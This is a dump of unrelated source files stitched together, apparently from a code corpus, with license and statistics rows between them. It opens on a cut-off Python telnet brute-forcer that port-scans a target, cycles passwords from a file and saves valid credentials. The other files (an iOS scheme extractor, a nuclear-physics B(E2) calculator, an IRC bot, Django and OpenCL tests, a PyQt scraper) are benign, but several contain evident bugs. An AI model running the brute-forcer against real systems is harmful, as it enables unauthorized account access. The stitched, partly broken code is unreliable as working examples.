asked_password_in_cnx = True # Last time asked for password in this connection?
if not need_user: # didn't ask for username, we read password
user, password = get_credentials(passwords_file)
if not password:
print "[-] No more Credentials to try"
sys.exit(0)
print "[+] Trying password:\t" + password
tn.write(password + "\n")
if ">" in response:
with open("valid_credentials.txt", "a") as f:
print "[+] Valid Credentials found:\t" + ' : '.join((user, password))
f.write("Valid Credentials found: " + ' : '.join((user, password)) + '\n')
break # Get out from input request while
if ">" in response:
break # Get out from main while
except EOFError as e:
pass # Disconnected, no problem, we will connect again.
if __name__ == "__main__":
if port_scan(sys.argv[1]):
brute_login(sys.argv[1], sys.argv[2])
| mit | -6,661,056,122,699,512,000 | 33.549451 | 101 | 0.499682 | false | 3.964691 | false | false | false |
ruozi/GetSchemeUrl_From_IPA | GetSchemeUrl.py | 1 | 1665 | #!/usr/bin/env python
#
# Scan IPA file and parse its Info.plist and report the SchemeUrl result.
#
# Copyright (c) 2015 by Ruozi,Pinssible. All rights reserved.
import zipfile
import os
import sys
import re
import plistlib
class GetSchemeUrl:
plist_file_rx = re.compile(r'Payload/.+?\.app/Info.plist$')
schemeurl_key_rx = re.compile(r'CFBundleURLSchemes')
def __init__(self,ipa_filename):
self.ipa_filename = ipa_filename
def get_filename_from_ipa(self):
zip_obj = zipfile.ZipFile(self.ipa_filename, 'r')
regx = GetSchemeUrl.plist_file_rx
filenames = zip_obj.namelist()
filename = ''
for fname in filenames:
if regx.search(fname):
filename = fname
break
return {'filename':filename, 'zip_obj': zip_obj}
def extract_scheme_url(self):
ipa_file = self.get_filename_from_ipa()
ipa_file = getter.get_filename_from_ipa()
plist_filename = ipa_file['filename']
zip_obj = ipa_file['zip_obj']
urlschmes = []
if plist_filename == '':
self.errors.append('Info.plist file not found in IPA')
else:
content = zip_obj.read(plist_filename)
data = plistlib.readPlistFromString(content)
urltypes = data['CFBundleURLTypes']
urlschemes = urltypes[0]['CFBundleURLSchemes']
return urlschemes
if __name__ == '__main__':
test_file_path = r'/Users/Ruozi/Music/iTunes/iTunes Media/Mobile Applications/SketchBook 3.1.2.ipa'
getter = GetSchemeUrl(test_file_path)
print getter.extract_scheme_url()
sys.exit(0)
| gpl-2.0 | -5,124,134,703,800,660,000 | 27.706897 | 103 | 0.618018 | false | 3.550107 | false | false | false |
Casarella/TRAPPER | TRAPPER.py | 1 | 10626 | #RedTrProb.py
#TRAPPER - TRAnsition Probability Processing/computER
#c. Jan 27, 2017 - Clark Casarella
# Updated to output to a LaTeX friendly table to the output file
# Does not take uncertainty in mixing into account
import math as m
import scipy.constants as sc
import numpy as np
csvpath=input("Enter path to csv file (including file extension): ")
print('Using the input parameters from',str(csvpath)+':')
outpath=input("Enter output path/filename (will be a text file): ")
print('Output placed at:',outpath)
output_file=open(outpath,'w')
#see_weisskopf_units=input("Do you want to see the Weisskopf unit conversion? [Y/N]")
#csvpath='162Dy_GRID.csv'
#csvpath='../162Dy_GRID/162Dy_GRID.csv'
#output_file=open('out.TEST','w')
dtype_full=[('E_g','f8'),('E_g_error','f8'),
('I_g','f8'),('I_g_error','f8'),('I_g_total','f8'),
('delta_mixing','f8'),('delta_upper','f8'),('delta_lower','f8'),
('tau','f8'),('tau_up','f8'),('tau_down','f8'),
('alpha_conv','f8'),('alpha_conv_error','f8'),
('A','int'),('multipolarity','S6'),
('E_level','f8')]
ndtype=str
npnames=['E_g','E_g_error','I_g','I_g_error','I_g_total',
'delta_mixing','delta_upper','delta_lower',
'tau','tau_up','tau_down','alpha_conv','alpha_conv_error',
'A','multipolarity','E_level']
csvfile = np.genfromtxt(csvpath,delimiter=",",skip_header=1,names=npnames,dtype=dtype_full)
#print('array:',csvfile)
#Test single input section
#E_g=0.888157
#I_g=174.8
#I_tot=369.3
#delta=0
#tau=2830*10**-15
#alpha_conv=0.0032
#multipolarity='E2'
#A=162
#E_g=1.31303
#I_g=0.428
#I_tot=1
#delta=0.28
#delta_up=0.34
#tau=320*10**-15
#alpha_conv=0
#multipolarity='E2(M1)'
#A=160
def set_multipolarity():
"""
Returns and extracts the multipolarity of a transition
Decoded from UTF-8 encoding on the string keyed 'multipolarity'
"""
#multipolarity=csvfile[0][14].decode("utf-8")[-1]
if multipolarity[-1]=='1':
return 1
elif multipolarity[-1]=='2':
return 2
else:
#return 2
return 'E2(M1)'
def BwE(A):
"""
Weisskopf estimate for an electric type, multipolarity
l transition, in units of e^2*fm^l
(1 W.u. = XXX e^2fm^l)
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return 0.12**(2*l)/(4*m.pi)*(3/(l+3))**2*A**(2*l/3)
def BwM(A):
"""
Weisskopf estimate for an magnetic type, multipolarity l transition,
in units of mu_N^2
"""
l=set_multipolarity()
if l=='E2(M1)':
l=1
return 0.12**(2*(l-1))*10/m.pi*(3/(l+3))**2*A**(2*(l-1))
def doublefactorial(n):
"""
Double factorial (every other n factorialed)
"""
if n <=0:
return 1
else:
return n*doublefactorial(n-2)
def mult_coefficient():
"""
This coefficient removes angular momentum mixing from the transition
probabilities.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return l*(doublefactorial(2*l+1))**2/(l+1)
#return l*(2*l+1)**2/(l+1)
#print('Coefficient for L:',mult_coefficient())
#print('BwE:',BwE(162))
def mixing_fraction(delta):
"""
Multipole mixing fraction for any mixed-multipolarity transitions
Unitless, and calculates relative E2 strength to M1 B(E2) strength
"""
#delta=csvfile[1][14][5]
l=set_multipolarity()
if l=='E2':
l=2
if delta==0 or l==1:
return 1
elif delta!=0 and l=='E2(M1)':
return delta**2/(1+delta**2)
#print(mixing_fraction(0.64))
def BR():
"""
Returns branching ratio (ratio of measured intensity to total intensity leaving the state)
"""
return I_g/I_tot
#print('Mixing Fraction Delta:',mixing_fraction(delta))
#units from scipy - generally helps with precision
m_p=sc.value('proton mass energy equivalent in MeV')
hc=sc.value('Planck constant over 2 pi times c in MeV fm')
hbar=sc.value('Planck constant over 2 pi in eV s')/10**6
barn=10**2
def B_coefficients():
"""
Calculates coefficients for the final B(pl) calculation.
Makes an exception for E1 transitions, traditionally reported in mW.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity=='E1':
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)*1000
else:
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)
def units():
"""
Corrects the units from e^2b^l to W.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity[0]=='E':
return barn**l*sc.alpha*sc.hbar/10**-9*sc.c/sc.e*BwE(A) # check here
elif multipolarity[0]=='M':
return hc*sc.alpha*BwM(A)*(hc/(2*m_p))**2 #check here again
#print('Units from MeVfm to W.u.:',units())
def latex_friendly_units():
"""
Returns LaTeX-friendly units for copying-pasting into LaTeX documents
"""
l=multipolarity
if l=='E1':
return 'mW.u.'
elif l=='E2':
return 'W.u.'
elif l=='M1':
return '$\mu_N^2$'
else:
return 'W.u. (mixed)'
def B(tau):
"""
Calculation of transition probability B(pl) from all inputs necessary
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if l==1:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),3)
else:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),2)
#determine delta_upper bounds on error
def mixing_upper_bounds():
"""
Determines which bound should be used for a particular mixing fraction
- Used in error propagation -
If delta <0, then the most E2 mixing will occur at the most negative number
(delta-delta_lower)
if delta >0, then the most E2 mixing will occur at the most positive number
(delta+delta_upper)
"""
if delta<0:
return delta-delta_lower
elif delta>0:
return delta+delta_upper
else:
return 0
def mixing_lower_bounds():
"""
Performs a similar function to finding the upper bounds on mixing,
Only on the lower bounds
"""
if delta<0:
return delta+delta_upper
elif delta>0:
return delta-delta_lower
else:
return 0
#Error propagation for symmetric quantities:
def dBdE():
#"""
#Uncertainty in B with respect to gamma
#ray energy
#"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/E_g*(2*l+1)*E_g_error)**2,3)
def dBdI():
"""
Uncertainty in B with respect to gamma
ray intensity
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((B(tau)/I_g*I_g_error)**2,3)**2
def dBdalpha():
"""
Uncertainty in B with respect to internal
conversion coefficient
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/(1+alpha_conv)*alpha_conv_error)**2,3)
"""
Asymmetric error is calculated via a 'consistent addition
technique' where B is calculated from the 'highest' value
and then subtracting the nominal value, etc
"""
def dBdtau_up():
"""
Calculation of B for the longest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_down),3)
def dBdtau_down():
"""
Calculation of B for the shortest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_up),3)
def uncertainty_tau_upper():
return round((-B(tau)+dBdtau_up())**2,3)
def uncertainty_tau_lower():
return round((B(tau)-dBdtau_down())**2,3)
#def calc_unc_delta_upper():
#"""
#This is an odd section, I need to calculate B under two
#delta conditions, upper and nominal,
#and subtract the two like I did for tau
#"""
#l=set_multipolarity()
#if l=='E2(M1)':
#tempB=B(tau)
#delta=mixing_upper_bounds()
#return -tempB+B(tau)
#else:
#return 0
#Aggregate uncertainty (upper bound)
def upper_uncertainty():
"""
Returns the upper bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_upper())**0.5,3)
#Aggregate uncertainty (lower bound)
def lower_uncertainty():
"""
Returns the lower bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_lower())**0.5,3)
#LaTeX Table header
output_file.write('\\begin{table}[ht]\n')
output_file.write('\\begin{tabular}{l|l|l|l|l|l|l}\n')
header1='E$_{lev}$ (keV) & E$_{\gamma}$ (keV) & I$_{\gamma}$ & ${\\tau}$ (fs)'
header2=' & $\pi\\ell$ & $\delta$ & B($\pi\\ell$) (W.u.) '
#Terminal Outputs - Not LaTeX friendly
output_file.write(header1+header2+'\\\\\hline\hline\n')
for row in list(range(len(csvfile))):
E_g=csvfile[row]['E_g']
E_g_error=csvfile[row]['E_g_error']
I_g=csvfile[row]['I_g']
I_g_error=csvfile[row]['I_g_error']
I_tot=csvfile[row]['I_g_total']
delta=csvfile[row]['delta_mixing']
delta_upper=csvfile[row]['delta_upper']
delta_lower=csvfile[row]['delta_lower']
tau=csvfile[row]['tau']
tau_up=csvfile[row]['tau_up']-tau
tau_down=tau-csvfile[row]['tau_down']
alpha_conv=csvfile[row]['alpha_conv']
alpha_conv_error=csvfile[row]['alpha_conv_error']
A=csvfile[row]['A']
multipolarity=csvfile[row]['multipolarity'].decode("utf-8")
E_lev=csvfile[row]['E_level']
#print('mixing',calc_unc_delta_upper(),tempB)
lineEnergy=str(round(E_lev,2)).ljust(16,' ')+'& '+(str(round(E_g*1000,2))+' ('+str(int(E_g_error*1000))+')').ljust(19,' ')+'& '
lineIntensity=(str(round(I_g,1))+' ('+str(int(I_g_error*10))+')').ljust(13,' ')+'& '+(str(int(tau))+'$^{+'+str(tau_up+tau)+'}_{'+str(tau_down-tau)+'}$').ljust(28,' ')+'& '
lineLifetime=str(multipolarity).ljust(10,' ')+'& '
lineDelta=(str(delta)+' $^{+'+str(delta_upper)+'}_{-'+str(delta_lower)+'}$').ljust(20,' ')+'& '
lineMult=(str(round(B(tau),2))+' $^{+'+str(round(-upper_uncertainty()+B(tau),2))+'}_{'+str(round(B(tau)-lower_uncertainty(),2))+'}$ '+latex_friendly_units()).ljust(30,' ')+'\\\\ \n'
output_file.write(lineEnergy+lineIntensity+lineLifetime+lineDelta+lineMult)
print('B('+multipolarity+')=',B(tau),'p\m',upper_uncertainty(),latex_friendly_units(),'for the',E_g*1000,'keV transition leaving the',E_lev,'keV state')
output_file.write('\\end{tabular}\n')
output_file.write('\caption{REMEMBER TO CHANGE TABLE CAPTION AND REFERENCE TAG HERE! \label{tab:BE2}}\n')
output_file.write('\\end{table}')
output_file.close()
| gpl-3.0 | 8,386,165,941,889,741,000 | 28.434903 | 185 | 0.621212 | false | 2.8828 | false | false | false |
nathantspencer/webknossos_toolkit | swc_tools/swc_offset.py | 1 | 1563 | import sys
def index_of(line):
return line.split()[0]
def type_of(line):
return line.split()[1]
def x_of(line):
return line.split()[2]
def y_of(line):
return line.split()[3]
def z_of(line):
return line.split()[4]
def radius_of(line):
return line.split()[5]
def parent_of(line):
return line.split()[6]
def offset(swc_path, x_offset, y_offset, z_offset):
f = open(swc_path, 'r')
lines = f.readlines()
lines_to_write = []
f.close()
for line in lines:
line.strip()
new_index = index_of(line) + ' '
new_type = type_of(line) + ' '
new_radius = radius_of(line) + ' '
new_parent = parent_of(line) + '\n'
new_x = str(float(x_of(line)) + x_offset) + ' '
new_y = str(float(y_of(line)) + y_offset) + ' '
new_z = str(float(z_of(line)) + z_offset) + ' '
line_to_write = new_index + new_type + new_x + new_y + new_z + new_radius + new_parent
lines_to_write.append(line_to_write)
f = open(swc_path[:-4] + '_offset.swc', 'w')
for line in lines_to_write:
f.write(line)
f.close()
if __name__ == "__main__":
if len(sys.argv) != 5:
print('\nSWC_OFFSET -- Written by Nathan Spencer 2017')
print('Usage: python swc_offset.py ["path/to/swc/file.swc"] [float x-offset] [float y-offset] [float z-offset]')
else:
swc_file = sys.argv[1]
x_offset = float(sys.argv[2])
y_offset = float(sys.argv[3])
z_offset = float(sys.argv[4])
offset(swc_file, x_offset, y_offset, z_offset)
| mit | 7,372,109,832,491,850,000 | 25.491525 | 120 | 0.557901 | false | 2.756614 | false | false | false |
raizkane/RaizBot | src/main.py | 1 | 2831 | #!/usr/bin/env python
'''
Copyright (C) 2015 Raiz Kane <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
# Importing necessary libraries/modules
import socket
# Functions must be defined here for later execution
server = "irc.oftc.net"
channel = "#botcontrol"
botnick = "RaizBot"
def ping():
ircsock.send("PONG :pingis\n")
def sendmsg(chan, msg):
ircsock.send("PRIVMSG "+ chan +" :"+ msg +"\n")
def joinchan(chan):
ircsock.send("JOIN "+ chan +"\n")
# The whole code goes here
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((server, 6667))
ircsock.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :This bot is a result of a tutoral covered on http://shellium.org/wiki.\n")
ircsock.send("NICK "+ botnick +"\n")
joinchan(channel)
joinchan("#oftc-hacker")
joinchan("#nottor")
while 1:
ircmsg = ircsock.recv(2048)
ircmsg = ircmsg.strip('\n\r')
print(ircmsg)
if ircmsg.find(":#nottor, contact") != -1:
sendmsg("#nottor", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#nottor", " E9B9 460F 0389 F4AC 713C")
sendmsg("#nottor", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#oftc-hacker, contact") != -1:
sendmsg("#oftc-hacker", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#oftc-hacker", " E9B9 460F 0389 F4AC 713C")
sendmsg("#oftc-hacker", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#nottor, map") != -1:
sendmsg("#nottor", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#oftc-hacker, map") != -1:
sendmsg("#oftc-hacker", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#nottor, awesomepentest") != -1:
sendmsg("#nottor", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#oftc-hacker, awesomepentest") != -1:
sendmsg("#oftc-hacker", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#nottor, who") != -1:
sendmsg("#nottor", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find(":#oftc-hacker, who") != -1:
sendmsg("#oftc-hacker", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find("PING :") != -1:
ping()
| agpl-3.0 | 3,580,462,610,263,847,000 | 31.54023 | 136 | 0.692688 | false | 2.740561 | false | false | false |
BurningNetel/ctf-manager | functional_tests/event/test_creating_event.py | 1 | 6665 | import time
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils import timezone, formats
from CTFmanager.models import Event
from functional_tests.base import FunctionalTest
from functional_tests.pages.event.add_event_page import NewEventPage, NewEventPageFields
from functional_tests.pages.event.event_detail_page import EventDetailPage
from functional_tests.pages.event.event_page import EventPage
class NewEventTests(FunctionalTest):
def test_can_create_an_event_from_event_page_and_retrieve_it_later(self):
self.create_and_login_user()
ep = EventPage(self)
# a user goes to the events page
ep.get_page()
# He checks the pages' title is correct
self.assertIn(ep.title, self.browser.title)
self.assertIn(reverse(ep.name), self.browser.current_url)
# the user wants to add a new event,
# so he clicks on the button to add a new event
btn_add_event = ep.get_add_event_button()
self.assertEqual(btn_add_event.get_attribute('text'), 'Add Event')
btn_add_event.click()
nep = NewEventPage(self)
# The browser redirects to a new page
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users fills in all the mandatory data
# The events name
tb_name = nep.get_name_input()
name = 'Hacklu'
tb_name.send_keys(name)
# The date and time that the event starts
datetime = nep.get_date_input()
self.assertEqual(NewEventPageFields.date_ph.value,
datetime.get_attribute('placeholder'))
# The date of the upcoming event is filled in the date textbox
datetime.clear()
_date = timezone.now() + timedelta(days=1)
formatted_date = formats.date_format(_date, "SHORT_DATETIME_FORMAT")
datetime.send_keys(str(_date.year) + '-' +
('0' + str(_date.month))[-2:] + '-' +
('0' + str(_date.day))[-2:] + " " +
str(_date.hour) + ":" +
str(_date.minute)
)
# Then, the user clicks the 'confirm' button
# when every necessary field has been filled in.
btn_confirm = nep.get_confirm_button()
self.assertEqual('btn btn-primary', btn_confirm.get_attribute('class'))
self.assertEqual('Save', btn_confirm.get_attribute('value'))
btn_confirm.click()
# The browser redirects the user to the events page
self.assertIn(reverse(ep.name), self.browser.current_url)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The new event is now visible on the events page
lg_upcoming = ep.get_upcoming_list_group()
rows = lg_upcoming.find_elements_by_tag_name('h4')
self.assertTrue(
any(name in row.text for row in rows)
)
self.assertTrue(
any(formatted_date in row.text for row in rows)
)
# The users wants to view details about the event
# He clicks on the link that is the name of the event to go to the details page
ep.click_on_event_in_upcoming_list_group(name)
self.assertIn('CTFman - ' + name, self.browser.title)
def test_duplicate_event_test(self):
self.create_and_login_user()
# A user wants to create an event for 2015 and for 2016,
# but uses the same name
nep = NewEventPage(self).get_page()
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users creates the first event, it submits correctly.
name = 'CTF' + str(round(time.time()))
date = '2016-01-01 18:00'
nep.submit_basic_event(name, date)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The users adds another event
nep.get_page()
self.assertIn(reverse('newEvent'), self.browser.current_url)
# He uses the same name
date2 = '2015-01-01 18:00'
nep.submit_basic_event(name, date2)
# The form now shows a error
self.assertIn(reverse(nep.name), self.browser.current_url)
self.browser.find_element_by_css_selector('.has-error')
def test_new_event_with_optional_fields_filled(self):
""" This test tests the add_event form, and the event detail page for optional fields
The user is going to add a new event,
He knows a lot about the event, so he is able to fill in all optional fields too
At the end of this test, he check if the optional fields are displayed on the events detail page.
The optional fields are: Description, Location, End_Date, Credentials, URL
(hidden fields): Creation_Date, Created_By
"""
self.create_and_login_user()
# browse to new event page
nep = NewEventPage(self).get_page()
# The user fills in all the field
next_year = (timezone.now() + timedelta(days=365)).year
nep.submit_complete_event('optionalEvent',
'%s-01-01' % next_year,
'test' * 30,
'Eindhoven',
'%s-01-02' % next_year,
'CTF_TEAM_NAME',
'SECURE_PASSWORD',
'hatstack.nl',
10,
1200)
# The user is now at the events overview page.
# He now goes to it's detail page
_event = Event.objects.first()
edp = EventDetailPage(self, _event.name)
edp.get_page()
# He checks if all the information is correct
description = edp.get_description_p()
location = edp.get_location()
url = edp.get_url()
username = edp.get_password()
password = edp.get_username()
# The header contains the events title, date, end date
header = edp.get_header()
edp.toggle_credentials_panel()
# Open the hidden field
time.sleep(1) # Wait for selenium to see the hidden fields.
self.assertIn('test' * 30, description.text)
self.assertIn('Eindhoven', location.text)
self.assertIn('hatstack.nl', url.text)
self.assertIn('CTF_TEAM_NAME', username.text)
self.assertIn('SECURE_PASSWORD', password.text)
self.assertIn('Jan. 1, %s' % next_year, header.text)
self.assertIn(' - ', header.text)
self.assertIn('Jan. 2, %s' % next_year, header.text) | gpl-3.0 | -7,033,169,181,387,475,000 | 40.403727 | 105 | 0.595649 | false | 3.943787 | true | false | false |
alepulver/changesets | patch_analyzer/patch_applicable_version.py | 1 | 2905 | import sys
import os
import patch_utils
from subprocess import Popen, PIPE, call
UTILITY_PATH = "src/main/java/"
PREFIX_BRANCH = "refs/tags/mule-"
def filter_starting_with(l, start):
return filter(lambda path: path.startswith(start), l)
def add_java(c):
return c + ".java"
def git_diff_files(git_source, v_origin, v_destination):
working_dir = os.getcwd()
try:
os.chdir(git_source)
call(["git", "fetch", "--tags"])
p = Popen(["git", "diff", "--name-only", v_origin + ".." + v_destination], stdout=PIPE)
output, _ = p.communicate()
files = [file.decode() for file in output.split(b"\n")]
return set(map(lambda file: file.split(UTILITY_PATH)[-1], filter(lambda file: UTILITY_PATH in file, files)))
finally:
os.chdir(working_dir)
class PatchDiffer:
def __init__(self, mule_ce_path, mule_ee_path):
self.ce = mule_ce_path
self.ee = mule_ee_path
@staticmethod
def conflicts(files, diff_files):
return list(set(files) & diff_files)
def is_applicable(self, changed_classes, origin_version, destination_version):
ce_files = map(add_java, filter_starting_with(changed_classes, "org"))
ee_files = map(add_java, filter_starting_with(changed_classes, "com"))
ce_diff = git_diff_files(self.ce, origin_version, destination_version)
ee_diff = git_diff_files(self.ee, origin_version, destination_version)
total_conflicts = self.conflicts(ce_files, ce_diff) + self.conflicts(ee_files, ee_diff)
self.last_conflicts = total_conflicts
return len(self.last_conflicts) == 0
def get_conflicts(self):
assert hasattr(self, "last_conflicts")
return self.last_conflicts
def print_usage():
print("Usage: ")
print("python " + sys.argv[0] + " <patch-file> <ce-git-folder> <ee-git-folder> <destination-version> (<origin-version>)")
print("If the origin version is not specified, it will be inferred from the Patch filename. Example:")
print("\tpython " + sys.argv[0] + " SE-2618-3.7.3.jar ../Git/mule-ce ../Git/mule-ee 3.7.4")
def main(args):
if len(args) < 4 or len(args) > 5:
print_usage()
sys.exit(1)
if len(args) == 4:
version = os.path.basename(args[0]).replace(".jar", "").split("-")[-1]
args.append(version)
patch_source, ce_path, ee_path, v_dest, v_org = args
v_dest = PREFIX_BRANCH + v_dest
v_org = PREFIX_BRANCH + v_org
p = PatchDiffer(ce_path, ee_path)
classes = patch_utils.modified_classes(patch_source)
if p.is_applicable(classes, v_org, v_dest):
print("The patch " + args[0] + " is applicable to the " + args[3] + " version")
else:
print("The patch " + args[0] + " has conflicts in files:")
for file in p.get_conflicts():
print("\t- " + file)
if __name__ == "__main__":
main(sys.argv[1:])
| mit | 2,717,768,461,241,766,000 | 34.864198 | 125 | 0.619621 | false | 3.217054 | false | false | false |
apatriciu/OpenStackOpenCL | ServerSidePythonOpenCLInterface/tests/testOpenCLInterfaceQueueObjects.py | 1 | 5499 | import unittest
import PyOpenCLInterface
import sys
class LaptopResources:
listDevicesIDs = [0]
dictProperties = {}
invalidQueueID = 1
device_type = "GPU"
class TestQueues(unittest.TestCase):
# define the expected response
testResources = LaptopResources()
def setUp(self):
retErr = PyOpenCLInterface.Initialize(self.testResources.device_type)
self.assertEqual(retErr, 0)
def tearDown(self):
pass
def testCreateQueue(self):
"""Creates a new context"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
# create mem queue
queueCreateFlags = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueCreateFlags)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
queueProperty, retErr = PyOpenCLInterface.GetQueueProperties(queueID)
self.assertEqual(queueProperty['id'], queueID)
self.assertEqual(queueProperty['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queueProperty['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue(queueID)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught:", sys.exc_info()[0]
def testGetUnknownObjectProperties(self):
"""Tries to retrieve the properties of an inexistent device"""
queueID = 0
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.GetQueueProperties, queueID)
def testRetainAndRelease(self):
"""
Create and release a context
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
retErr = PyOpenCLInterface.ReleaseQueue( queueID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
# try to release again
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.ReleaseQueue, queueID)
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.RetainQueue, queueID)
try:
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
def testMultipleQueues(self):
"""
Creates multiple queues
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queue1ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID])
queueAttribs = []
queue2ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID, queue2ID])
queue1Property, retErr = PyOpenCLInterface.GetQueueProperties(queue1ID)
self.assertEqual(queue1Property['id'], queue1ID)
self.assertEqual(queue1Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue1Property['Context'], contextID)
queue2Property, retErr = PyOpenCLInterface.GetQueueProperties(queue2ID)
self.assertEqual(queue2Property['id'], queue2ID)
self.assertEqual(queue2Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue2Property['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue( queue1ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue2ID])
retErr = PyOpenCLInterface.ReleaseQueue( queue2ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -9,009,627,036,438,824,000 | 44.446281 | 133 | 0.652846 | false | 4.134586 | true | false | false |
codeAB/music-player | singer.py | 1 | 4368 | #!/usr/bin/python3
# -*- coding: utf8 -*-
"""
抓取歌手头像
"""
import sys
import os
import urllib.parse
import urllib.request
import re
from PyQt5.QtWidgets import (
QApplication, QWidget, QPushButton, QLineEdit, QLabel)
from PyQt5.QtWebKitWidgets import QWebPage, QWebView
from PyQt5.QtCore import Qt, QUrl, pyqtSlot,QTimer
from PyQt5.QtGui import ( QCursor)
class Singer(QWidget):
# def __init__(self,singer,music):
def __init__(self,singer):
super().__init__()
# 窗口居于所有窗口的顶端
self.setWindowFlags(Qt.WindowOverridesSystemGestures)
#针对X11
self.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.singer = singer
# self.music = music
self.initUI()
self.show()
def initUI(self):
self.w= QWidget(self)
self.setGeometry(300,100,1000,600)
l = QLabel("实用说明,搜索需要的图片,在搜索结果页面点击选择的图片即可设置。。双击此处退出",self)
l.move(0,0)
self.web = QWebView(self)
self.web.loadFinished.connect(self.test)
self.web.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.web.page().linkClicked.connect(self.linkClicked)
self.web.setGeometry(0, 30, 1000, 570)
# self.btn = QPushButton("测试",self);
# self.btn.clicked.connect(self.test)
# self.btn.move(300,550)
self.web.load(QUrl("http://image.baidu.com/"))
def test(self):
print("jiazaijieshu")
frame = self.web.page().currentFrame()
searchinput = frame.findFirstElement('#kw')
d = frame.findFirstElement('.img_area_container_box')
d.removeAllChildren()
